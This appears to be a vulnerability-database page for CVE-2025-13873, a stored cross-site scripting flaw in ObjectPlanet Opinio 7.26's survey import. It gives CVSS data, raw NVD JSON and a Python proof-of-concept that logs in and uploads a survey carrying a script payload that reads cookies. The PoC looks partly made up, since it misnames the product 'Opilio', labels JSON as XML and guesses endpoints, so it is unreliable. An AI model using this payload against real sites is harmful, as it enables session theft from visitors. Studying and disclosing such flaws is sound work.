Security Vulnerability Report
中文
CVE-2025-13873 CVSS 5.4 MEDIUM

CVE-2025-13873

Published: 2025-12-02 10:16:02
Last Modified: 2025-12-04 17:49:40
Source: 64c5ae8f-7972-4697-86a0-7ada793ac795

Description

Stored Cross-Site Scripting (XSS) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:* - VULNERABLE
ObjectPlanet Opilio 7.26 rev12562

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13873 PoC - Stored XSS in ObjectPlanet Opilio survey-import # Target: ObjectPlanet Opilio 7.26 rev12562 TARGET_URL = "http://target.com/opinio" LOGIN_URL = f"{TARGET_URL}/user/login" IMPORT_URL = f"{TARGET_URL}/admin/survey/import" session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "username": "attacker_user", "password": "password123" } response = session.post(LOGIN_URL, data=login_data) if response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Upload malicious survey with XSS payload malicious_survey = { "name": "Malicious Survey", "questions": [ { "text": "<script>alert(document.cookie)</script>", "type": "text" } ] } files = { "surveyFile": ("malicious_survey.xml", json.dumps(malicious_survey), "application/xml") } response = session.post(IMPORT_URL, files=files) if "success" in response.text.lower(): print("[+] Malicious survey imported successfully") print("[+] XSS payload stored in survey-import feature") print("[+] Any user accessing this survey will execute the injected JavaScript") else: print("[-] Failed to import malicious survey")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13873", "sourceIdentifier": "64c5ae8f-7972-4697-86a0-7ada793ac795", "published": "2025-12-02T10:16:02.073", "lastModified": "2025-12-04T17:49:40.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored Cross-Site Scripting (XSS) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey."}, {"lang": "es", "value": "Cross-site scripting almacenado (XSS) en la función de importación de encuestas de ObjectPlanet Opinio 7.26 rev12562 en la aplicación web permite a un atacante inyectar código JavaScript arbitrario, que se ejecuta en el contexto de navegación de cualquier visitante que accede a la encuesta comprometida."}], "metrics": {"cvssMetricV40": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:*", "matchCriteriaId": "6684DC3A-4DF1-4417-913C-EE8E169B75B5"}]}]}], "references": [{"url": "https://www.objectplanet.com/opinio/changelog.html", "source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.